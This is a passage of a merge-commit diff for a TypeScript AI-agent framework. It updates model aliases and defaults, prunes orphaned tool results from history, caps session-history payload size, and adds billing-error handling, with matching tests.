Merge branch 'main' into qianfan

This commit is contained in:
ide-rea
2026-02-06 17:58:28 +08:00
committed by GitHub
413 changed files with 26165 additions and 6070 deletions

View File

@@ -287,16 +287,18 @@ describe("exec notifyOnExit", () => {
expect(result.details.status).toBe("running");
const sessionId = (result.details as { sessionId: string }).sessionId;
const prefix = sessionId.slice(0, 8);
let finished = getFinishedSession(sessionId);
const deadline = Date.now() + (isWin ? 8000 : 2000);
while (!finished && Date.now() < deadline) {
let hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
const deadline = Date.now() + (isWin ? 12_000 : 5_000);
while ((!finished || !hasEvent) && Date.now() < deadline) {
await sleep(20);
finished = getFinishedSession(sessionId);
hasEvent = peekSystemEvents("agent:main:main").some((event) => event.includes(prefix));
}
expect(finished).toBeTruthy();
const events = peekSystemEvents("agent:main:main");
expect(events.some((event) => event.includes(sessionId.slice(0, 8)))).toBe(true);
expect(hasEvent).toBe(true);
});
});

View File

@@ -9,8 +9,10 @@ export type ResolvedCliBackend = {
const CLAUDE_MODEL_ALIASES: Record<string, string> = {
opus: "opus",
"opus-4.6": "opus",
"opus-4.5": "opus",
"opus-4": "opus",
"claude-opus-4-6": "opus",
"claude-opus-4-5": "opus",
"claude-opus-4": "opus",
sonnet: "sonnet",

View File

@@ -106,6 +106,10 @@ describe("pruneHistoryForContextShare", () => {
});
it("returns droppedMessagesList containing dropped messages", () => {
// Note: This test uses simple user messages with no tool calls.
// When orphaned tool_results exist, droppedMessages may exceed
// droppedMessagesList.length since orphans are counted but not
// added to the list (they lack context for summarization).
const messages: AgentMessage[] = [
makeMessage(1, 4000),
makeMessage(2, 4000),
@@ -121,6 +125,7 @@ describe("pruneHistoryForContextShare", () => {
});
expect(pruned.droppedChunks).toBeGreaterThan(0);
// Without orphaned tool_results, counts match exactly
expect(pruned.droppedMessagesList.length).toBe(pruned.droppedMessages);
// All messages accounted for: kept + dropped = original
@@ -145,4 +150,144 @@ describe("pruneHistoryForContextShare", () => {
expect(pruned.droppedMessagesList).toEqual([]);
expect(pruned.messages.length).toBe(1);
});
it("removes orphaned tool_result messages when tool_use is dropped", () => {
// Scenario: assistant with tool_use is in chunk 1 (dropped),
// tool_result is in chunk 2 (kept) - orphaned tool_result should be removed
// to prevent "unexpected tool_use_id" errors from Anthropic's API
const messages: AgentMessage[] = [
// Chunk 1 (will be dropped) - contains tool_use
{
role: "assistant",
content: [
{ type: "text", text: "x".repeat(4000) },
{ type: "toolUse", id: "call_123", name: "test_tool", input: {} },
],
timestamp: 1,
},
// Chunk 2 (will be kept) - contains orphaned tool_result
{
role: "toolResult",
toolCallId: "call_123",
toolName: "test_tool",
content: [{ type: "text", text: "result".repeat(500) }],
timestamp: 2,
} as AgentMessage,
{
role: "user",
content: "x".repeat(500),
timestamp: 3,
},
];
const pruned = pruneHistoryForContextShare({
messages,
maxContextTokens: 2000,
maxHistoryShare: 0.5,
parts: 2,
});
// The orphaned tool_result should NOT be in kept messages
// (this is the critical invariant that prevents API errors)
const keptRoles = pruned.messages.map((m) => m.role);
expect(keptRoles).not.toContain("toolResult");
// The orphan count should be reflected in droppedMessages
// (orphaned tool_results are dropped but not added to droppedMessagesList
// since they lack context for summarization)
expect(pruned.droppedMessages).toBeGreaterThan(pruned.droppedMessagesList.length);
});
it("keeps tool_result when its tool_use is also kept", () => {
// Scenario: both tool_use and tool_result are in the kept portion
const messages: AgentMessage[] = [
// Chunk 1 (will be dropped) - just user content
{
role: "user",
content: "x".repeat(4000),
timestamp: 1,
},
// Chunk 2 (will be kept) - contains both tool_use and tool_result
{
role: "assistant",
content: [
{ type: "text", text: "y".repeat(500) },
{ type: "toolUse", id: "call_456", name: "kept_tool", input: {} },
],
timestamp: 2,
},
{
role: "toolResult",
toolCallId: "call_456",
toolName: "kept_tool",
content: [{ type: "text", text: "result" }],
timestamp: 3,
} as AgentMessage,
];
const pruned = pruneHistoryForContextShare({
messages,
maxContextTokens: 2000,
maxHistoryShare: 0.5,
parts: 2,
});
// Both assistant and toolResult should be in kept messages
const keptRoles = pruned.messages.map((m) => m.role);
expect(keptRoles).toContain("assistant");
expect(keptRoles).toContain("toolResult");
});
it("removes multiple orphaned tool_results from the same dropped tool_use", () => {
// Scenario: assistant with multiple tool_use blocks is dropped,
// all corresponding tool_results should be removed from kept messages
const messages: AgentMessage[] = [
// Chunk 1 (will be dropped) - contains multiple tool_use blocks
{
role: "assistant",
content: [
{ type: "text", text: "x".repeat(4000) },
{ type: "toolUse", id: "call_a", name: "tool_a", input: {} },
{ type: "toolUse", id: "call_b", name: "tool_b", input: {} },
],
timestamp: 1,
},
// Chunk 2 (will be kept) - contains orphaned tool_results
{
role: "toolResult",
toolCallId: "call_a",
toolName: "tool_a",
content: [{ type: "text", text: "result_a" }],
timestamp: 2,
} as AgentMessage,
{
role: "toolResult",
toolCallId: "call_b",
toolName: "tool_b",
content: [{ type: "text", text: "result_b" }],
timestamp: 3,
} as AgentMessage,
{
role: "user",
content: "x".repeat(500),
timestamp: 4,
},
];
const pruned = pruneHistoryForContextShare({
messages,
maxContextTokens: 2000,
maxHistoryShare: 0.5,
parts: 2,
});
// No orphaned tool_results should be in kept messages
const keptToolResults = pruned.messages.filter((m) => m.role === "toolResult");
expect(keptToolResults).toHaveLength(0);
// The orphan count should reflect both dropped tool_results
// droppedMessages = 1 (assistant) + 2 (orphaned tool_results) = 3
// droppedMessagesList only has the assistant message
expect(pruned.droppedMessages).toBe(pruned.droppedMessagesList.length + 2);
});
});

View File

@@ -2,6 +2,7 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core";
import type { ExtensionContext } from "@mariozechner/pi-coding-agent";
import { estimateTokens, generateSummary } from "@mariozechner/pi-coding-agent";
import { DEFAULT_CONTEXT_TOKENS } from "./defaults.js";
import { repairToolUseResultPairing } from "./session-transcript-repair.js";
export const BASE_CHUNK_RATIO = 0.4;
export const MIN_CHUNK_RATIO = 0.15;
@@ -333,11 +334,27 @@ export function pruneHistoryForContextShare(params: {
break;
}
const [dropped, ...rest] = chunks;
const flatRest = rest.flat();
// After dropping a chunk, repair tool_use/tool_result pairing to handle
// orphaned tool_results (whose tool_use was in the dropped chunk).
// repairToolUseResultPairing drops orphaned tool_results, preventing
// "unexpected tool_use_id" errors from Anthropic's API.
const repairReport = repairToolUseResultPairing(flatRest);
const repairedKept = repairReport.messages;
// Track orphaned tool_results as dropped (they were in kept but their tool_use was dropped)
const orphanedCount = repairReport.droppedOrphanCount;
droppedChunks += 1;
droppedMessages += dropped.length;
droppedMessages += dropped.length + orphanedCount;
droppedTokens += estimateMessagesTokens(dropped);
// Note: We don't have the actual orphaned messages to add to droppedMessagesList
// since repairToolUseResultPairing doesn't return them. This is acceptable since
// the dropped messages are used for summarization, and orphaned tool_results
// without their tool_use context aren't useful for summarization anyway.
allDroppedMessages.push(...dropped);
keptMessages = rest.flat();
keptMessages = repairedKept;
}
return {

View File

@@ -1,6 +1,6 @@
// Defaults for agent metadata when upstream does not supply them.
// Model id uses pi-ai's built-in Anthropic catalog.
export const DEFAULT_PROVIDER = "anthropic";
export const DEFAULT_MODEL = "claude-opus-4-5";
// Context window: Opus 4.5 supports ~200k tokens (per pi-ai models.generated.ts).
export const DEFAULT_MODEL = "claude-opus-4-6";
// Conservative fallback used when model metadata is unavailable.
export const DEFAULT_CONTEXT_TOKENS = 200_000;

View File

@@ -3,11 +3,17 @@ export type ModelRef = {
id?: string | null;
};
const ANTHROPIC_PREFIXES = ["claude-opus-4-5", "claude-sonnet-4-5", "claude-haiku-4-5"];
const ANTHROPIC_PREFIXES = [
"claude-opus-4-6",
"claude-opus-4-5",
"claude-sonnet-4-5",
"claude-haiku-4-5",
];
const OPENAI_MODELS = ["gpt-5.2", "gpt-5.0"];
const CODEX_MODELS = [
"gpt-5.2",
"gpt-5.2-codex",
"gpt-5.3-codex",
"gpt-5.1-codex",
"gpt-5.1-codex-mini",
"gpt-5.1-codex-max",

View File

@@ -140,7 +140,7 @@ describe("getApiKeyForModel", () => {
} catch (err) {
error = err;
}
expect(String(error)).toContain("openai-codex/gpt-5.2");
expect(String(error)).toContain("openai-codex/gpt-5.3-codex");
} finally {
if (previousOpenAiKey === undefined) {
delete process.env.OPENAI_API_KEY;

View File

@@ -213,7 +213,7 @@ export async function resolveApiKeyForProvider(params: {
const hasCodex = listProfilesForProvider(store, "openai-codex").length > 0;
if (hasCodex) {
throw new Error(
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.2 (ChatGPT OAuth) or set OPENAI_API_KEY for openai/gpt-5.2.',
'No API key found for provider "openai". You are authenticated with OpenAI Codex OAuth. Use openai-codex/gpt-5.3-codex (OAuth) or set OPENAI_API_KEY to use openai/gpt-5.1-codex.',
);
}
}
@@ -302,6 +302,7 @@ export function resolveEnvApiKey(provider: string): EnvApiKeyResult | null {
mistral: "MISTRAL_API_KEY",
opencode: "OPENCODE_API_KEY",
qianfan: "QIANFAN_API_KEY",
ollama: "OLLAMA_API_KEY",
};
const envVar = envMap[normalized];
if (!envVar) {

View File

@@ -13,9 +13,9 @@ import {
isTimeoutError,
} from "./failover-error.js";
import {
buildConfiguredAllowlistKeys,
buildModelAliasIndex,
modelKey,
parseModelRef,
resolveConfiguredModelRef,
resolveModelRefFromString,
} from "./model-selection.js";
@@ -51,28 +51,6 @@ function shouldRethrowAbort(err: unknown): boolean {
return isAbortError(err) && !isTimeoutError(err);
}
function buildAllowedModelKeys(
cfg: OpenClawConfig | undefined,
defaultProvider: string,
): Set<string> | null {
const rawAllowlist = (() => {
const modelMap = cfg?.agents?.defaults?.models ?? {};
return Object.keys(modelMap);
})();
if (rawAllowlist.length === 0) {
return null;
}
const keys = new Set<string>();
for (const raw of rawAllowlist) {
const parsed = parseModelRef(String(raw ?? ""), defaultProvider);
if (!parsed) {
continue;
}
keys.add(modelKey(parsed.provider, parsed.model));
}
return keys.size > 0 ? keys : null;
}
function resolveImageFallbackCandidates(params: {
cfg: OpenClawConfig | undefined;
defaultProvider: string;
@@ -82,7 +60,10 @@ function resolveImageFallbackCandidates(params: {
cfg: params.cfg ?? {},
defaultProvider: params.defaultProvider,
});
const allowlist = buildAllowedModelKeys(params.cfg, params.defaultProvider);
const allowlist = buildConfiguredAllowlistKeys({
cfg: params.cfg,
defaultProvider: params.defaultProvider,
});
const seen = new Set<string>();
const candidates: ModelCandidate[] = [];
@@ -166,7 +147,10 @@ function resolveFallbackCandidates(params: {
cfg: params.cfg ?? {},
defaultProvider,
});
const allowlist = buildAllowedModelKeys(params.cfg, defaultProvider);
const allowlist = buildConfiguredAllowlistKeys({
cfg: params.cfg,
defaultProvider,
});
const seen = new Set<string>();
const candidates: ModelCandidate[] = [];

View File

@@ -29,6 +29,17 @@ describe("model-selection", () => {
});
});
it("normalizes anthropic alias refs to canonical model ids", () => {
expect(parseModelRef("anthropic/opus-4.6", "openai")).toEqual({
provider: "anthropic",
model: "claude-opus-4-6",
});
expect(parseModelRef("opus-4.6", "anthropic")).toEqual({
provider: "anthropic",
model: "claude-opus-4-6",
});
});
it("should use default provider if none specified", () => {
expect(parseModelRef("claude-3-5-sonnet", "anthropic")).toEqual({
provider: "anthropic",

View File

@@ -16,6 +16,12 @@ export type ModelAliasIndex = {
byKey: Map<string, string[]>;
};
const ANTHROPIC_MODEL_ALIASES: Record<string, string> = {
"opus-4.6": "claude-opus-4-6",
"opus-4.5": "claude-opus-4-5",
"sonnet-4.5": "claude-sonnet-4-5",
};
function normalizeAliasKey(value: string): string {
return value.trim().toLowerCase();
}
@@ -59,13 +65,7 @@ function normalizeAnthropicModelId(model: string): string {
return trimmed;
}
const lower = trimmed.toLowerCase();
if (lower === "opus-4.5") {
return "claude-opus-4-5";
}
if (lower === "sonnet-4.5") {
return "claude-sonnet-4-5";
}
return trimmed;
return ANTHROPIC_MODEL_ALIASES[lower] ?? trimmed;
}
function normalizeProviderModelId(provider: string, model: string): string {
@@ -99,6 +99,33 @@ export function parseModelRef(raw: string, defaultProvider: string): ModelRef |
return { provider, model: normalizedModel };
}
export function resolveAllowlistModelKey(raw: string, defaultProvider: string): string | null {
const parsed = parseModelRef(raw, defaultProvider);
if (!parsed) {
return null;
}
return modelKey(parsed.provider, parsed.model);
}
export function buildConfiguredAllowlistKeys(params: {
cfg: OpenClawConfig | undefined;
defaultProvider: string;
}): Set<string> | null {
const rawAllowlist = Object.keys(params.cfg?.agents?.defaults?.models ?? {});
if (rawAllowlist.length === 0) {
return null;
}
const keys = new Set<string>();
for (const raw of rawAllowlist) {
const key = resolveAllowlistModelKey(String(raw ?? ""), params.defaultProvider);
if (key) {
keys.add(key);
}
}
return keys.size > 0 ? keys : null;
}
export function buildModelAliasIndex(params: {
cfg: OpenClawConfig;
defaultProvider: string;

View File

@@ -12,4 +12,45 @@ describe("Ollama provider", () => {
// Ollama requires explicit configuration via OLLAMA_API_KEY env var or profile
expect(providers?.ollama).toBeUndefined();
});
it("should disable streaming by default for Ollama models", async () => {
const agentDir = mkdtempSync(join(tmpdir(), "openclaw-test-"));
process.env.OLLAMA_API_KEY = "test-key";
try {
const providers = await resolveImplicitProviders({ agentDir });
// Provider should be defined with OLLAMA_API_KEY set
expect(providers?.ollama).toBeDefined();
expect(providers?.ollama?.apiKey).toBe("OLLAMA_API_KEY");
// Note: discoverOllamaModels() returns empty array in test environments (VITEST env var check)
// so we can't test the actual model discovery here. The streaming: false setting
// is applied in the model mapping within discoverOllamaModels().
// The configuration structure itself is validated by TypeScript and the Zod schema.
} finally {
delete process.env.OLLAMA_API_KEY;
}
});
it("should have correct model structure with streaming disabled (unit test)", () => {
// This test directly verifies the model configuration structure
// since discoverOllamaModels() returns empty array in test mode
const mockOllamaModel = {
id: "llama3.3:latest",
name: "llama3.3:latest",
reasoning: false,
input: ["text"],
cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
contextWindow: 128000,
maxTokens: 8192,
params: {
streaming: false,
},
};
// Verify the model structure matches what discoverOllamaModels() would return
expect(mockOllamaModel.params?.streaming).toBe(false);
expect(mockOllamaModel.params).toHaveProperty("streaming");
});
});

View File

@@ -136,6 +136,11 @@ async function discoverOllamaModels(): Promise<ModelDefinitionConfig[]> {
cost: OLLAMA_DEFAULT_COST,
contextWindow: OLLAMA_DEFAULT_CONTEXT_WINDOW,
maxTokens: OLLAMA_DEFAULT_MAX_TOKENS,
// Disable streaming by default for Ollama to avoid SDK issue #1205
// See: https://github.com/badlogic/pi-mono/issues/1205
params: {
streaming: false,
},
};
});
} catch (error) {

View File

@@ -181,6 +181,128 @@ describe("sessions tools", () => {
expect(withToolsDetails.messages).toHaveLength(2);
});
it("sessions_history caps oversized payloads and strips heavy fields", async () => {
callGatewayMock.mockReset();
const oversized = Array.from({ length: 80 }, (_, idx) => ({
role: "assistant",
content: [
{
type: "text",
text: `${String(idx)}:${"x".repeat(5000)}`,
},
{
type: "thinking",
thinking: "y".repeat(7000),
thinkingSignature: "sig".repeat(4000),
},
],
details: {
giant: "z".repeat(12000),
},
usage: {
input: 1,
output: 1,
},
}));
callGatewayMock.mockImplementation(async (opts: unknown) => {
const request = opts as { method?: string };
if (request.method === "chat.history") {
return { messages: oversized };
}
return {};
});
const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
expect(tool).toBeDefined();
if (!tool) {
throw new Error("missing sessions_history tool");
}
const result = await tool.execute("call4b", {
sessionKey: "main",
includeTools: true,
});
const details = result.details as {
messages?: Array<Record<string, unknown>>;
truncated?: boolean;
droppedMessages?: boolean;
contentTruncated?: boolean;
bytes?: number;
};
expect(details.truncated).toBe(true);
expect(details.droppedMessages).toBe(true);
expect(details.contentTruncated).toBe(true);
expect(typeof details.bytes).toBe("number");
expect((details.bytes ?? 0) <= 80 * 1024).toBe(true);
expect(details.messages && details.messages.length > 0).toBe(true);
const first = details.messages?.[0] as
| {
details?: unknown;
usage?: unknown;
content?: Array<{
type?: string;
text?: string;
thinking?: string;
thinkingSignature?: string;
}>;
}
| undefined;
expect(first?.details).toBeUndefined();
expect(first?.usage).toBeUndefined();
const textBlock = first?.content?.find((block) => block.type === "text");
expect(typeof textBlock?.text).toBe("string");
expect((textBlock?.text ?? "").length <= 4015).toBe(true);
const thinkingBlock = first?.content?.find((block) => block.type === "thinking");
expect(thinkingBlock?.thinkingSignature).toBeUndefined();
});
it("sessions_history enforces a hard byte cap even when a single message is huge", async () => {
callGatewayMock.mockReset();
callGatewayMock.mockImplementation(async (opts: unknown) => {
const request = opts as { method?: string };
if (request.method === "chat.history") {
return {
messages: [
{
role: "assistant",
content: [{ type: "text", text: "ok" }],
extra: "x".repeat(200_000),
},
],
};
}
return {};
});
const tool = createOpenClawTools().find((candidate) => candidate.name === "sessions_history");
expect(tool).toBeDefined();
if (!tool) {
throw new Error("missing sessions_history tool");
}
const result = await tool.execute("call4c", {
sessionKey: "main",
includeTools: true,
});
const details = result.details as {
messages?: Array<Record<string, unknown>>;
truncated?: boolean;
droppedMessages?: boolean;
contentTruncated?: boolean;
bytes?: number;
};
expect(details.truncated).toBe(true);
expect(details.droppedMessages).toBe(true);
expect(details.contentTruncated).toBe(false);
expect(typeof details.bytes).toBe("number");
expect((details.bytes ?? 0) <= 80 * 1024).toBe(true);
expect(details.messages).toHaveLength(1);
expect(details.messages?.[0]?.content).toContain(
"[sessions_history omitted: message too large]",
);
});
it("sessions_history resolves sessionId inputs", async () => {
callGatewayMock.mockReset();
const sessionId = "sess-group";

View File

@@ -8,12 +8,12 @@ import {
describe("resolveOpencodeZenAlias", () => {
it("resolves opus alias", () => {
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("opus")).toBe("claude-opus-4-6");
});
it("keeps legacy aliases working", () => {
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("sonnet")).toBe("claude-opus-4-6");
expect(resolveOpencodeZenAlias("haiku")).toBe("claude-opus-4-6");
expect(resolveOpencodeZenAlias("gpt4")).toBe("gpt-5.1");
expect(resolveOpencodeZenAlias("o1")).toBe("gpt-5.2");
expect(resolveOpencodeZenAlias("gemini-2.5")).toBe("gemini-3-pro");
@@ -32,14 +32,14 @@ describe("resolveOpencodeZenAlias", () => {
});
it("is case-insensitive", () => {
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-5");
expect(resolveOpencodeZenAlias("OPUS")).toBe("claude-opus-4-6");
expect(resolveOpencodeZenAlias("Gpt5")).toBe("gpt-5.2");
});
});
describe("resolveOpencodeZenModelApi", () => {
it("maps APIs by model family", () => {
expect(resolveOpencodeZenModelApi("claude-opus-4-5")).toBe("anthropic-messages");
expect(resolveOpencodeZenModelApi("claude-opus-4-6")).toBe("anthropic-messages");
expect(resolveOpencodeZenModelApi("gemini-3-pro")).toBe("google-generative-ai");
expect(resolveOpencodeZenModelApi("gpt-5.2")).toBe("openai-responses");
expect(resolveOpencodeZenModelApi("alpha-gd4")).toBe("openai-completions");
@@ -53,13 +53,14 @@ describe("getOpencodeZenStaticFallbackModels", () => {
it("returns an array of models", () => {
const models = getOpencodeZenStaticFallbackModels();
expect(Array.isArray(models)).toBe(true);
expect(models.length).toBe(9);
expect(models.length).toBe(10);
});
it("includes Claude, GPT, Gemini, and GLM models", () => {
const models = getOpencodeZenStaticFallbackModels();
const ids = models.map((m) => m.id);
expect(ids).toContain("claude-opus-4-6");
expect(ids).toContain("claude-opus-4-5");
expect(ids).toContain("gpt-5.2");
expect(ids).toContain("gpt-5.1-codex");
@@ -83,15 +84,16 @@ describe("getOpencodeZenStaticFallbackModels", () => {
describe("OPENCODE_ZEN_MODEL_ALIASES", () => {
it("has expected aliases", () => {
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-5");
expect(OPENCODE_ZEN_MODEL_ALIASES.opus).toBe("claude-opus-4-6");
expect(OPENCODE_ZEN_MODEL_ALIASES.codex).toBe("gpt-5.1-codex");
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt5).toBe("gpt-5.2");
expect(OPENCODE_ZEN_MODEL_ALIASES.gemini).toBe("gemini-3-pro");
expect(OPENCODE_ZEN_MODEL_ALIASES.glm).toBe("glm-4.7");
expect(OPENCODE_ZEN_MODEL_ALIASES["opus-4.5"]).toBe("claude-opus-4-5");
// Legacy aliases (kept for backward compatibility).
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-5");
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-5");
expect(OPENCODE_ZEN_MODEL_ALIASES.sonnet).toBe("claude-opus-4-6");
expect(OPENCODE_ZEN_MODEL_ALIASES.haiku).toBe("claude-opus-4-6");
expect(OPENCODE_ZEN_MODEL_ALIASES.gpt4).toBe("gpt-5.1");
expect(OPENCODE_ZEN_MODEL_ALIASES.o1).toBe("gpt-5.2");
expect(OPENCODE_ZEN_MODEL_ALIASES["gemini-2.5"]).toBe("gemini-3-pro");

View File

@@ -1,8 +1,11 @@
/**
* OpenCode Zen model catalog with dynamic fetching, caching, and static fallback.
*
* OpenCode Zen is a $200/month subscription that provides proxy access to multiple
* AI models (Claude, GPT, Gemini, etc.) through a single API endpoint.
* OpenCode Zen is a pay-as-you-go token-based API that provides access to curated
* models optimized for coding agents. It uses per-request billing with auto top-up.
*
* Note: OpenCode Black ($20/$100/$200/month subscriptions) is a separate product
* with flat-rate usage tiers. This module handles Zen, not Black.
*
* API endpoint: https://opencode.ai/zen/v1
* Auth URL: https://opencode.ai/auth
@@ -11,7 +14,7 @@
import type { ModelApi, ModelDefinitionConfig } from "../config/types.js";
export const OPENCODE_ZEN_API_BASE_URL = "https://opencode.ai/zen/v1";
export const OPENCODE_ZEN_DEFAULT_MODEL = "claude-opus-4-5";
export const OPENCODE_ZEN_DEFAULT_MODEL = "claude-opus-4-6";
export const OPENCODE_ZEN_DEFAULT_MODEL_REF = `opencode/${OPENCODE_ZEN_DEFAULT_MODEL}`;
// Cache for fetched models (1 hour TTL)
@@ -21,19 +24,20 @@ const CACHE_TTL_MS = 60 * 60 * 1000; // 1 hour
/**
* Model aliases for convenient shortcuts.
* Users can use "opus" instead of "claude-opus-4-5", etc.
* Users can use "opus" instead of "claude-opus-4-6", etc.
*/
export const OPENCODE_ZEN_MODEL_ALIASES: Record<string, string> = {
// Claude
opus: "claude-opus-4-5",
opus: "claude-opus-4-6",
"opus-4.6": "claude-opus-4-6",
"opus-4.5": "claude-opus-4-5",
"opus-4": "claude-opus-4-5",
"opus-4": "claude-opus-4-6",
// Legacy Claude aliases (OpenCode Zen rotates model catalogs; keep old keys working).
sonnet: "claude-opus-4-5",
"sonnet-4": "claude-opus-4-5",
haiku: "claude-opus-4-5",
"haiku-3.5": "claude-opus-4-5",
sonnet: "claude-opus-4-6",
"sonnet-4": "claude-opus-4-6",
haiku: "claude-opus-4-6",
"haiku-3.5": "claude-opus-4-6",
// GPT-5.x family
gpt5: "gpt-5.2",
@@ -119,6 +123,7 @@ const MODEL_COSTS: Record<
cacheRead: 0.107,
cacheWrite: 0,
},
"claude-opus-4-6": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
"claude-opus-4-5": { input: 5, output: 25, cacheRead: 0.5, cacheWrite: 6.25 },
"gemini-3-pro": { input: 2, output: 12, cacheRead: 0.2, cacheWrite: 0 },
"gpt-5.1-codex-mini": {
@@ -143,6 +148,7 @@ const DEFAULT_COST = { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 };
const MODEL_CONTEXT_WINDOWS: Record<string, number> = {
"gpt-5.1-codex": 400000,
"claude-opus-4-6": 1000000,
"claude-opus-4-5": 200000,
"gemini-3-pro": 1048576,
"gpt-5.1-codex-mini": 400000,
@@ -159,6 +165,7 @@ function getDefaultContextWindow(modelId: string): number {
const MODEL_MAX_TOKENS: Record<string, number> = {
"gpt-5.1-codex": 128000,
"claude-opus-4-6": 128000,
"claude-opus-4-5": 64000,
"gemini-3-pro": 65536,
"gpt-5.1-codex-mini": 128000,
@@ -195,6 +202,7 @@ function buildModelDefinition(modelId: string): ModelDefinitionConfig {
*/
const MODEL_NAMES: Record<string, string> = {
"gpt-5.1-codex": "GPT-5.1 Codex",
"claude-opus-4-6": "Claude Opus 4.6",
"claude-opus-4-5": "Claude Opus 4.5",
"gemini-3-pro": "Gemini 3 Pro",
"gpt-5.1-codex-mini": "GPT-5.1 Codex Mini",
@@ -222,6 +230,7 @@ function formatModelName(modelId: string): string {
export function getOpencodeZenStaticFallbackModels(): ModelDefinitionConfig[] {
const modelIds = [
"gpt-5.1-codex",
"claude-opus-4-6",
"claude-opus-4-5",
"gemini-3-pro",
"gpt-5.1-codex-mini",

View File

@@ -1,6 +1,6 @@
import type { AssistantMessage } from "@mariozechner/pi-ai";
import { describe, expect, it } from "vitest";
import { formatAssistantErrorText } from "./pi-embedded-helpers.js";
import { BILLING_ERROR_USER_MESSAGE, formatAssistantErrorText } from "./pi-embedded-helpers.js";
describe("formatAssistantErrorText", () => {
const makeAssistantError = (errorMessage: string): AssistantMessage =>
@@ -53,4 +53,19 @@ describe("formatAssistantErrorText", () => {
);
expect(formatAssistantErrorText(msg)).toBe("LLM error server_error: Something exploded");
});
it("returns a friendly billing message for credit balance errors", () => {
const msg = makeAssistantError("Your credit balance is too low to access the Anthropic API.");
const result = formatAssistantErrorText(msg);
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
});
it("returns a friendly billing message for HTTP 402 errors", () => {
const msg = makeAssistantError("HTTP 402 Payment Required");
const result = formatAssistantErrorText(msg);
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
});
it("returns a friendly billing message for insufficient credits", () => {
const msg = makeAssistantError("insufficient credits");
const result = formatAssistantErrorText(msg);
expect(result).toBe(BILLING_ERROR_USER_MESSAGE);
});
});

View File

@@ -6,6 +6,7 @@ export {
stripThoughtSignatures,
} from "./pi-embedded-helpers/bootstrap.js";
export {
BILLING_ERROR_USER_MESSAGE,
classifyFailoverReason,
formatRawAssistantErrorForUi,
formatAssistantErrorText,

View File

@@ -3,6 +3,9 @@ import type { OpenClawConfig } from "../../config/config.js";
import type { FailoverReason } from "./types.js";
import { formatSandboxToolPolicyBlockedMessage } from "../sandbox.js";
export const BILLING_ERROR_USER_MESSAGE =
"⚠️ API provider returned a billing error — your API key has run out of credits or has an insufficient balance. Check your provider's billing dashboard and top up or switch to a different API key.";
export function isContextOverflowError(errorMessage?: string): boolean {
if (!errorMessage) {
return false;
@@ -368,6 +371,10 @@ export function formatAssistantErrorText(
return "The AI service is temporarily overloaded. Please try again in a moment.";
}
if (isBillingErrorMessage(raw)) {
return BILLING_ERROR_USER_MESSAGE;
}
if (isLikelyHttpErrorText(raw) || isRawApiErrorPayload(raw)) {
return formatRawAssistantErrorForUi(raw);
}
@@ -403,6 +410,10 @@ export function sanitizeUserFacingText(text: string): string {
);
}
if (isBillingErrorMessage(trimmed)) {
return BILLING_ERROR_USER_MESSAGE;
}
if (isRawApiErrorPayload(trimmed) || isLikelyHttpErrorText(trimmed)) {
return formatRawAssistantErrorForUi(trimmed);
}

View File

@@ -1,4 +1,4 @@
import { describe, expect, it, vi } from "vitest";
import { beforeEach, describe, expect, it, vi } from "vitest";
vi.mock("../pi-model-discovery.js", () => ({
discoverAuthStorage: vi.fn(() => ({ mocked: true })),
@@ -6,6 +6,7 @@ vi.mock("../pi-model-discovery.js", () => ({
}));
import type { OpenClawConfig } from "../../config/config.js";
import { discoverModels } from "../pi-model-discovery.js";
import { buildInlineProviderModels, resolveModel } from "./model.js";
const makeModel = (id: string) => ({
@@ -18,6 +19,12 @@ const makeModel = (id: string) => ({
maxTokens: 1,
});
beforeEach(() => {
vi.mocked(discoverModels).mockReturnValue({
find: vi.fn(() => null),
} as unknown as ReturnType<typeof discoverModels>);
});
describe("buildInlineProviderModels", () => {
it("attaches provider ids to inline models", () => {
const providers = {
@@ -127,4 +134,74 @@ describe("resolveModel", () => {
expect(result.model?.provider).toBe("custom");
expect(result.model?.id).toBe("missing-model");
});
it("builds an openai-codex fallback for gpt-5.3-codex", () => {
const templateModel = {
id: "gpt-5.2-codex",
name: "GPT-5.2 Codex",
provider: "openai-codex",
api: "openai-codex-responses",
baseUrl: "https://chatgpt.com/backend-api",
reasoning: true,
input: ["text", "image"] as const,
cost: { input: 1.75, output: 14, cacheRead: 0.175, cacheWrite: 0 },
contextWindow: 272000,
maxTokens: 128000,
};
vi.mocked(discoverModels).mockReturnValue({
find: vi.fn((provider: string, modelId: string) => {
if (provider === "openai-codex" && modelId === "gpt-5.2-codex") {
return templateModel;
}
return null;
}),
} as unknown as ReturnType<typeof discoverModels>);
const result = resolveModel("openai-codex", "gpt-5.3-codex", "/tmp/agent");
expect(result.error).toBeUndefined();
expect(result.model).toMatchObject({
provider: "openai-codex",
id: "gpt-5.3-codex",
api: "openai-codex-responses",
baseUrl: "https://chatgpt.com/backend-api",
reasoning: true,
contextWindow: 272000,
maxTokens: 128000,
});
});
it("keeps unknown-model errors for non-gpt-5 openai-codex ids", () => {
const result = resolveModel("openai-codex", "gpt-4.1-mini", "/tmp/agent");
expect(result.model).toBeUndefined();
expect(result.error).toBe("Unknown model: openai-codex/gpt-4.1-mini");
});
it("uses codex fallback even when openai-codex provider is configured", () => {
// This test verifies the ordering: codex fallback must fire BEFORE the generic providerCfg fallback.
// If ordering is wrong, the generic fallback would use api: "openai-responses" (the default)
// instead of "openai-codex-responses".
const cfg: OpenClawConfig = {
models: {
providers: {
"openai-codex": {
baseUrl: "https://custom.example.com",
// No models array, or models without gpt-5.3-codex
},
},
},
